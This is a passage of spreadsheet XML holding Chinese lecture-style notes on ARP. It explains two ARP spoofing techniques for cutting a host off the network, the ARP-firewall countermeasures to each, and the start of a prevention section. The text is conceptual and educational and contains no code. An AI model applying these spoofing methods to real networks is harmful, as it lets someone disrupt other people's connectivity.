        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上网，要发送数据给外网电脑</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>K</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，但是必须经过网关</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，这个时候</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>就会通过广播进行</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>arp</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>询问（询问网关的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）：我是主机</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，我的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>123</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>QQWW,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>请问网关</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>001</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>你的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是多少？网关收到数据包后回复主机</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>123</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>QQWW</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）：我是网关</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>001</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，我的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>OOPP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。就上面的一喊一答，漏洞很多。</t>
    </r>
  </si>
  <si>
    <r>
      <t>2.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>欺骗方法</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：冒充网关，欺骗受害主机（如网络执法官）</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>;</t>
    </r>
  </si>
  <si>
    <r>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不想让</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上网，就等</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喊完了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回答完了，再冒充一次网关</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回答（回答时让</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是真的，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>却是一个不存在的地址），</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>第一次得到正确值，但是当第二次假地址来的时候仍然当真，把第一次的抹杀，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上网的数据全丢了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>因为网关的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>与</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不对应，数据给不到网关</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，不能上网了。（其实</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不用等到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喊或</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>答，就平白无故的，不间断的告诉冒充网关告诉</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>假的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>就</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ok</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>了）</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>;</t>
    </r>
  </si>
  <si>
    <r>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防火墙的对策：我会帮助</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>记住正确的地址，你来假的，我就会紧随其后来个真的。</t>
    </r>
  </si>
  <si>
    <r>
      <t>2.1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>欺骗方法二：冒充受害机，欺骗网关</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（如网络剪刀手）</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>;</t>
    </r>
  </si>
  <si>
    <r>
      <t>上面我们说到的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是喊（广播）的，当</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>听到后，并不是单单回答，而且会默默地把</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的地址记在心里（网关也会建立</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓冲表）。这就是利用之处，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不想让</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上网，就代替</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">B </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>询问（不是喊了，因为如果被</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>听到会“地址冲突”）格式这样：我是主机</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ip123</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>HTY</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>（假的），主机</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP001</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>OOPP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。这样网关也会默默记住。断网原理，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>虽然把数据给了网关，但是网关回复数据的时候却丢了（因为在网关的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓冲内，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>B</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>与</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不对应）。</t>
    </r>
  </si>
  <si>
    <r>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防火墙的对策：网卡混杂模式，无论你</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>怎样说话，我都能听到（问什么呢？因为网线上的电流变化就像水波一样，到处蔓延，只是不混杂的，不是发给自己</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>或广播的就不理睬，哪怕是冒充自己的）。然后发送正确的报文。</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">3 </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防范措施</t>
    </r>
  </si>
  <si>
    <r>
      <t>大部分</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防火墙的原理通过在系统内核层拦截虚假</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据包以及在攻击时主动向网关发包</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主动通告网关本机正确的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>MAC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址，使之网关能够正确识别客户端</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>而发包的速度多少就可能影响网速，所以在大型网内在攻击时都有可能影响网速，在客户端进行防御是不能够完全抵御的，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>攻击应该从</t>
    </r>
  </si>
  <si>
    <r>
      <t>源头上解决才行！（风云不支持</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>VISTA</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）；</t>
    </r>
  </si>
  <si>
    <r>
      <t>3.1.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>建立</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DHCP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>建议建在网关上，因为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DHCP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不占用多少</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>CPU</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，而且</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ARP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>欺骗攻击一般总是先攻击网关，我们就是要让他先攻击网关，因为网关这里有监控程序的，网关地址建议选择</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>192.168.10.2</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
